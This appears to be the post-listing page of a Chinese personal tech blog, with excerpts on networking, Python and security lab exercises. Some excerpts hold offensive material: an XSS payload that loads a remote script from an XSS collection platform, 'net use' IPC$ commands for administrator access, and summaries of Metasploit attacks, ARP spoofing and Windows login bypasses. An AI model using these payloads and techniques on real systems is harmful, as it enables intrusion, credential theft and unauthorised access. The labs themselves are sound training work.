- 博客(24)
- 收藏
- 关注
RSS订阅原创 XSS漏洞:反射型、存储型、dom型
一、概念二、实验XSS反射型 getXSS反射型 post1) <script>alert(1)</script> 2) <sCRiPt sRC=//xsshs.cn/Qelk></sCrIpT> xss平台至少有伴儿概率拿不到任何东西,习惯就好,多试试XSS存储型...
2021-08-08 18:31:37
413
原创 phpmyadmin scripts/setup.php 反序列化漏洞攻击实验
msf攻击phpmyadmin 4.0x - 4.6.2 远程代码执行漏洞。Phpmyadmin Scripts/setup.php Deserialization Vulnerability (WooYun-2016-199433)deserialization n 反序列化,还原序列化目标(被攻击)计算机搭建漏洞环境:攻击计算机启用漏洞攻击模块:目标(被攻击)计算机退出漏洞环境:攻击计算机退出漏洞攻击环境:...
2020-10-07 18:03:21
932
原创 msf攻击mysql_authbypass_hashdump漏洞
我是用的是vulhub进行漏洞环境搭建,具体怎么搭建我在这儿就不说了,我主要讲下如果使用msf进行攻击的,过程相当简单~~~
2020-10-06 23:03:08
768
原创 判断主机操作系统的三种方法
方法1(14分)通过更改URL大小写判断,服务器是linux还是winds。方法2 (15分)可以通过TTL判断操作系统是linux还是windowshttps://blog.csdn.net/woshiwumingshi1/article/details/54312179但是这个不准确方法3 (18分)kali环境,使用nmap判断主机操作系统命令 nmap -O URL...
2020-10-06 14:49:20
678
原创 ‘=‘ ‘.copy‘ ‘copy.copy‘ 和 ‘copy.deepcopy‘ (浅拷贝 深拷贝)
a = colors ,既不是浅拷贝也是深拷贝,id一样,指向同一个内存存储位置。‘.copy’ ‘copy.copy’,这两个一样的,内存存储位置不同,但是源数据修改,新数据跟着修改。‘copy.deepcopy’ ,和源数据没有半毛钱关系了,id不同,源数据修改,新数据不会跟着修改。代码如下:colors = ['blue', 'yellow', 'red', [1, 2, 3, 4.5], 'black', 'white', 'pink']print('修改前,colors的id是{}
2020-08-22 14:16:14
192
原创 列表的嵌套 教师随机分配办公室大题(非常详细)
一共10位教师,随机安放在3个办公室,问题1:请随机安排这10位教师,并且使用两种方法?问题2:打印出办公室序列号,共几名教师,分别有谁?print('--------------------------------------------------------------------------------')'''问题1:随机将10名教师放入4个办公室中'''# 方法1:使用一级功能模块random,二级功能模块randintteachers = ['t1', 't2', 't3',
2020-08-21 14:11:51
456
原创 PyCharm关闭双击shift全局搜索
在使用pycharm过程中,我们经常会使用到敲击shift健,切换中英文,但是双击shift键就会触发,打开pycharm全局搜索,jetbrain的软件貌似双击shift都会打开全局搜索。步骤一:双击shift — action–搜索registry–回车步骤二:找到 ide.suppress.double.click.handler — 勾选上 ----点击close关闭再次双击shift就会发现,全局搜索出不来了。...
2020-08-11 16:26:37
2251
4
原创 server2003简单部署web服务器--IIS
直接上实验安装IIS准备好web资源windows web服务器叫做IIS,IIS跑.asp,如下图:Apache和tomcat是另外两个web服务器,下几篇我们在做实验。设置IP地址,我们现在只能内网访问,你们访问的百度京东什么的,都购买了公网地址,内网地址在公网上直接会被丢弃。这里我们设置成10.1.1.21/24新建网站Apache和tomcat是另外两个web服务器,下几篇我们在做实验。配置active server page设
2020-07-25 14:50:59
245
原创 PE系统解决忘记开机密码
现在很多人都人手两台以上电脑,忘记开机密码情况,也是大有人在,今天我们用PE系统来解决一下这个问题。概念PE,微型系统,Preintallment Enviroment,英文翻译就是预安装环境,说人话就是,行走的C盘。PE走到哪台计算机上面,就当C盘系统盘使,原来的系统盘,就成为D盘、E盘了。原理原理也很简单,就是PE微型系统放到U盘里,或者刻录在光盘里,插到哪台计算机上,或者放到哪台计算机里面,计算机启动PE系统,就不启动原理C盘了,这样我们就可以更改 C:windows/system32
2020-07-25 07:27:34
1894
原创 粘滞键+脱机隐私声明破解win7开机密码
介绍1)粘滞键粘滞键是windows里的一个程序,就是在开机后,未输入账号密码未登录时,敲击5次shift键即可出,如图:粘滞键就是个程序。2)脱机隐私声明在第一次电脑开启过程中强制关机,则在第二次开机时,就会出现如下页面,如图:我们选择第一项,启动修复,如图:就会出现启动修复的一些详细信息,大家仔细看下这个,这是一个本地的txt文件,我们就是利用这里文件,进行 “狸猫换太子”。2. 原理计算机调用程序的时候,就是通过文件名称,包括破解软件的时候,也是这个道理。在这里,.
2020-07-23 09:17:49
1244
转载 找不到gpedit.msc 的解决方法
通常打开本地组策略编辑器,只需要 win + R 在运行里输入 gpedit.msc 就可以打开。 但是,在windows家庭版和学生版里,会提示找不到路径。可以用以下办法解决:新建一个文本文档,名字随便取,编辑以下批处理内容,保存后将后缀名改为.bat ,右键使用管理员权限执行:@echo offpushd "%~dp0"dir /b C:\Windows\servicing\Packages\Microsoft-Windows-GroupPolicy-ClientExtensions-Pac
2020-07-22 09:06:20
553
转载 Windows Update Medic Service拒绝访问问题
1.首先以管理员身份运行cmd输入REG add “HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc” /v “Start” /t REG_DWORD /d “4” /f这一步已经将Windows Update Medic Service禁用了,但是还能恢复2.运行“regedit”,打开注册表编辑器,定位到 “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc”,右
2020-07-22 08:52:08
4001
原创 静态NAT、动态NAT、PAT、静态PAT学习笔记
一、介绍定义NAT是网络地址转换,Network Address Translations。产生的原因因为ipv4地址不够人类使用了。。。。。IPv4地址分类IP地址分为公网IP和私网IP公网IP只能在公网上使用私网IP只能在内网中使用公网上不允许出现私有IP地址私网IP可以重复在内网使用私有IP地址范围1)10.0.0.0/8 (10开头的)2)172.16.0.0/16 - 172.31.0.0/16(172.16开头的一直到172.31开头的)
2020-07-21 15:55:19
1505
转载 IPv4地址分类(A类 B类 C类 D类 E类)
5类地址(A类 B类 C类 D类 E类)IPv4地址由四段组成,每个字段是一个字节,8位,最大值是255,,IPv4地址由两部分组成,即网络地址和主机地址。网络地址表示其属于互联网的哪一个网络,主机地址表示其属于该网络中的哪一台主机,二者是主从关系。IPv4地址的四大类型标识的是网络中的某台主机。IPv4地址长度为32位,共4个字节,但实际中我们用点分十进制记法,将IP转换成二进制值后对照该图即可。IPv4地址根据网络号和主机号来分,分为A、B、C三类及特殊地址D、E。全0和全1的都保留不用,如A
2020-07-21 14:31:13
21134
原创 浅谈HSRP 热备份路由协议
引入随着人们上网的逐渐普及,以及对网络的依赖性越来越高,现在对网络的可靠性也是越来越高。我们在日常上网的时候,都会用到路由器,如果路由器发生故障,那么配置该路由器网关的终端,都会断网。解决这个问题也不难,就是添加路由器来解决这个问题,用冗余的思路。----引出了配置多台路由器思路现在我们配置了多台路由器,一台路由出现故障,则切换至另外一个路由器,切换的过程,如果网工手动配置的话,那还不累死个人,公司一百个人,难道要一个一个配置?肯定不是,这时候,我们发明出了一个新的协议来解决这个问题----HSR.
2020-07-19 15:09:48
310
原创 白话学习防火墙3 之防火墙工作模式(适用于IPS、IDS、WAF等其他安全设备)
说白了 透明模式就是当交换机使,路由模式就是当路由使,混杂就是杂交物种,即当作路由使,又当作交换机使。透明模式透明模式一般用于网络建设完,网络功能基本已经实现的情况下,用户需要加装防火墙以实现安全区域隔离的要求;早期也称之为桥模式。桥这个字是缘由于,交换机之前称之为网桥。透明模式,意思就是字面意思,就是说,加装了这个防火墙,并不会影响原有网络的布局,之前的的该在同一网段的还在同一网段,不该在同一网段的,还是不会在同一个网段。所以这个防火墙,只可能工作在二层,路由器和交换机之间,等于说又加了一台交换
2020-07-17 14:31:35
2011
1
原创 白话学习防火墙 2 之IPS和IDS
IPS IDSIPS 入侵防御系统入侵防御系统(IPS: Intrusion Prevention System)是电脑网络安全设施,是对防病毒软件(Antivirus Programs)和防火墙(Packet Filter, Application Gateway)的补充。 入侵防御系统(Intrusion-prevention system)是一部能够监视网络或网络设备的网络资料传输行为的计算机网络安全设备,能够及时的中断、调整或隔离一些不正常或是具有伤害性的网络资料传输行为。IPS位于内网或者D
2020-07-17 10:25:55
583
原创 白话学习防火墙 1
一、基本介绍什么是防火墙firewall?what is firewall? firewall is a wall.就是字面意思,防火墙就是一堵墙,但是防火墙不是隔离空间的,而是隔离网络的,隔离要保护的网络与其他网络。写入的网络可通行,没有写入的不可通行,与ACL正相反。(以后我会再写篇文章介绍下ACL。防火墙,并不是杀毒,杀木马,本质工作是在三层和四层上隔离网络,病毒和木马属于数据应用层攻击,功能访问控制攻击防护冗余设计路由器、交换机日志记录虚拟专用VPNNAT防火
2020-07-16 22:55:06
224
转载 应用层常见协议及端口号
在TCP/IP模型中,应用层是最高层。应用层包括所有的高层协议,并且不断有新的协议加入。TCP/IP参考模型中应用层和下层协议之间的关系如下:应用层的许多协议都是基于(C/S client /server)方式的。下面为我们就图片上的应用层协议来进行下简单的介绍:基于TCP协议的都用C/S方式:一:TELNET (远程登录) (C/S)(tcp)*概述:远程登录,它是Tnternet中用来进行远程访问的重要工具之一。远程登录功能允许用户与远程计算机进行动态交互,即用自己的键盘,鼠标等输入设
2020-07-15 10:48:52
851
原创 445端口爆破试验 net use IPC$
原理445 是文件共享端口,就是说,pc1文件夹共享后,pc2通过账户密码即可更改、读取、完全控制该文件夹。但是有个漏洞,就是如果net user 路径写的不是文件夹,而是ipc$ 或者 c$,意味着pc2权限就会很大。命令命令1net use f: \10.1.1.11\test test666.com /user:administrator命令2net use \10.1.1.11\ipc$ test666.com /user:administratoripc$ 是 空连接的意.
2020-07-14 23:32:16
1952
2
原创 文科生如何简单理解VLAN
名称VLAN, V—virtual 虚拟的 LAN—局域网,VLAN—虚拟局域网。VLAN 产生的原因先说一下背景每台计算机都有两个身份证号,一个是身份证 --mac地址,另外一个是护照号–IP地址;有一点不同的是,我们使用身份证是可以在国内自由活动的,护照在国外使用,但是在计算机上,我们对外通信的标示只能是护照号–ip地址,你也理解为,除了自己以外,任何地方都是国外。别人如果想联系你,首先要知道你的护照号–IP地址,然后通过IP地址找到你的身份证,再找到你。(这个地方大家不要太纠结于,..
2020-07-13 23:11:56
224
原创 长角牛网络监听 arp欺骗
一、原理arp欺骗和攻击的原理是一样的,都是向目标计算机投毒,发送虚假ip地址对应的mac地址,致使被投毒计算机数据被窃听或者数据被盗取。多数情况欺骗和攻击会发生在计算机和网关的连接过程中,给目标计算机发送假的网关ip对应的mac地址,可以导致目标计算机上不了网;攻击的话,可以看到目标计算通过网关浏览了哪些数据或者发送了哪些数据。今天我们使用长角牛网络监听软件,对目标计算机投毒,这个实验很简单。二、实验win server 2003 -1 是被投毒计算机;win server 2003 -2 是
2020-07-12 10:33:40
564
1
原创 arp中间人数据监听实验
废话不多说,直接上干活,欢迎大神指点。一、原理arp协议,就是通过广播的方式,找到对应ip的mac地址,这个协议本身有缺点,所以在内网,可做内网欺骗攻击(由于路由器会隔绝广播域,所以arp只可做内网欺骗攻击)。这个实验说的就是 pc1和pc2进行通信,pc3发送虚假的arp报文,也就是发送虚假的IP对应的mac地址报文,分别给到pc1和pc2;当pc1已知pc2的ip,不知道mac地址时,会发送arp包到广播域,这时pc3会回包假的mac地址,pc2同理。二、实验pc1设置ip地址,pc2设置i
2020-07-11 23:52:23
318
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人